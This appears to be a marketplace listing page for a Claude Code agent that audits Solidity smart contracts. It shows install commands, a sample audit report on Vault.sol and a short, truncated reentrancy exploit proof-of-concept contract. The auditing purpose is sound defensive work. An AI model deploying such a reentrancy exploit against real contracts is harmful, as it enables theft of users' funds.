Skills2026年3月29日·1 分钟阅读

Claude Code Agent: Smart Contract Auditor — Web3 Security

Claude Code agent for auditing Solidity smart contracts. Reentrancy, overflow, access control, gas optimization, and best practices.

Skill Factory · Community

Agent 就绪

先审查再安装

这个资产需要先审查。复制的指令会要求 Agent dry-run、列出写入项，确认后再继续。

Needs Confirmation · 62/100策略：需确认

Agent 入口

任意 MCP/CLI Agent

类型

Agent

安装

Single

信任

信任等级：Established

入口

Claude Code Agent: Smart Contract Auditor

先审查命令

npx -y tokrepo@latest install bdf1e117-e30b-40eb-8ebf-fb63d7eaee34 --target codex

先 dry-run，确认写入项后再运行此命令。

TL;DR

A Claude Code agent that audits Solidity smart contracts for reentrancy, overflow, access control, and gas optimization.

§01

What it is

Smart Contract Auditor is a specialized Claude Code agent for blockchain and Web3 security tasks. It conducts security assessments of Solidity smart contracts, detecting vulnerabilities like reentrancy attacks, integer overflow, access control issues, flash loan exploits, and MEV attack vectors. The agent uses a systematic approach combining automated scanning with manual inspection for business logic flaws.

This agent targets Solidity developers and security researchers who need automated vulnerability detection before deploying contracts to mainnet. It integrates with static analysis tools like Slither, Mythril, and Semgrep.

§02

How it saves time or tokens

Manual smart contract auditing requires deep expertise and hours of line-by-line review. This agent automates the first pass, identifying common vulnerability patterns and flagging suspicious code sections. The token estimate is approximately 500 tokens for the agent configuration.

The agent generates structured audit reports with severity classifications, so development teams can prioritize fixes by impact rather than reviewing findings in random order.

§03

How to use

Install the agent from Claude Code Templates:

npx claude-code-templates@latest --agent blockchain-web3/smart-contract-auditor --yes

The agent activates automatically when Claude Code detects Solidity files or blockchain-related tasks.

Ask the agent to audit a contract:

Audit the Vault.sol contract for security vulnerabilities.
Focus on reentrancy, access control, and economic attack vectors.

§04

Example

The agent produces structured findings like this:

§05

Audit Report: Vault.sol

Critical

Reentrancy in withdraw(): External call before state update

on line 45. Move the balance update before the transfer.

High

Missing access control on setFee(): Any address can change

the protocol fee. Add onlyOwner modifier.

Medium

Unchecked return value: transferFrom on line 78 does not

check the boolean return. Use SafeERC20.safeTransferFrom.

Gas Optimization

Storage reads in loop: balances[msg.sender] read 3 times

in processRewards(). Cache in a local variable.


The agent can also generate proof-of-concept exploit code:

// Reentrancy exploit PoC

contract Exploit {

Vault public vault;

constructor(address _vault) {

vault = Vault(_vault);

}

function attack() external payable {

vault.deposit{value: msg.value}();

vault.withdraw();

}

receive() external payable {

if (address(vault).balance >= 1 ether) {

vault.withdraw();

}

§06

Related on TokRepo

AI Tools for Security -- Security scanning and audit tools
AI Tools for Coding -- Developer productivity agents and tools

§07

Common pitfalls

Automated auditing catches common patterns but misses business logic vulnerabilities. Always pair automated scanning with manual review of economic incentives and edge cases.
The agent works with Solidity contracts. Vyper, Cairo, and Move contracts require different tooling and analysis approaches.
Static analysis tools (Slither, Mythril) need to be installed separately. The agent integrates with them but does not install them. Run pip install slither-analyzer and pip install mythril before using those features.

常见问题

What vulnerability types does the agent detect?+

The agent checks for reentrancy, integer overflow/underflow, access control issues, flash loan attack vectors, MEV vulnerabilities, unchecked return values, and gas optimization opportunities. It follows OWASP guidelines adapted for smart contracts.

Does it work with any Solidity version?+

The agent analyzes Solidity contracts across versions. It understands both older patterns (SafeMath for pre-0.8) and newer built-in overflow checks. Specify the compiler version in your pragma for accurate analysis.

Can it generate proof-of-concept exploits?+

Yes. For critical and high severity findings, the agent can generate Solidity exploit contracts that demonstrate the vulnerability. These PoCs help developers understand the attack vector and verify their fixes.

Does it integrate with Slither and Mythril?+

Yes. The agent can run Slither for static analysis and Mythril for symbolic execution if they are installed in your environment. Results from these tools are incorporated into the audit report.

How do I install the agent?+

Run 'npx claude-code-templates@latest --agent blockchain-web3/smart-contract-auditor --yes' to install. The agent activates automatically in Claude Code when it detects Solidity files or blockchain security tasks.

引用来源 (3)

Claude Code Templates— Claude Code Templates provide specialized agent configurations
Slither GitHub— Slither static analysis framework for Solidity
OWASP— OWASP Smart Contract Security guidelines

🙏

来源与感谢

Created by Claude Code Templates by davila7. Licensed under MIT. Install: npx claude-code-templates@latest --agent blockchain-web3/smart-contract-auditor --yes

讨论

登录后参与讨论。

还没有评论，来写第一条吧。